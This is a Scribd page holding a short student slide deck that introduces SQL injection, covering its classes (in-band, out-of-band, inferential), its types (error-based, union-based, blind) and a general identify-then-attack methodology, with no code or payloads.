Scribd
Upload
21 views

Web Based SQL Injection

This document discusses SQL injection, including what it is, different classes and types of SQL injection, and methodology for exploiting SQL injection vulnerabilities. SQL injection occurs when code is injected into database queries via web forms. There are three classes: in-band extracts data via the same channel, out-of-band uses a different channel like email, and inferential does not transfer data directly but reconstructs information by observing server behavior. Types include error-based using errors to glean info, union-based combining query results, and blind-based asking true/false questions. The methodology identifies the injection, determines the type, then attacks using error, union, or blind techniques from easiest to hardest.

Uploaded by

Yagouba Diallo
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
21 views

Web Based SQL Injection

This document discusses SQL injection, including what it is, different classes and types of SQL injection, and methodology for exploiting SQL injection vulnerabilities. SQL injection occurs when code is injected into database queries via web forms. There are three classes: in-band extracts data via the same channel, out-of-band uses a different channel like email, and inferential does not transfer data directly but reconstructs information by observing server behavior. Types include error-based using errors to glean info, union-based combining query results, and blind-based asking true/false questions. The methodology identifies the injection, determines the type, then attacks using error, union, or blind techniques from easiest to hardest.

Uploaded by

Yagouba Diallo
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 7

WEB BASED SQL INJECTION

Yagouba diallo WEK100734

agenda
What is qli Sql injection classes Sql injection typpe Methodology

What is sql and sqli


code injection technique that exploits a security vulnerability in application occurs at the database layer of an application SQL - Structured Query Language Used to communicate with the database

SQL injection classes


We have 3 classes INBAND:data is extracted by the same channel that si used to inject the code OUT OF BAND:data is retrieved using a different channel EX:email INFERENTIAL: there is not actual tranfer of data but the tester is able to reconstruct the info by sending partucular request and observing the resulting behavior of the DB server

SQl injection types


We have 3 typpes: Eror based:asking the DB a question that will cause an error and gleening info from the eror. Union based: is used to combine the results of 2 or more SELECT SQL. Blind: asking the DB a true/false question and using whether valid page returned or not or by using the time it took for your valid page to return as the answer of the question

Methodology
IDENTIFY: Identify the injection (tool or manual) Determine injection typpe (integer or string)

ATTACK: Error based union based Blind based ressort)

(easiest) (great for data extration) (worst case and last

You might also like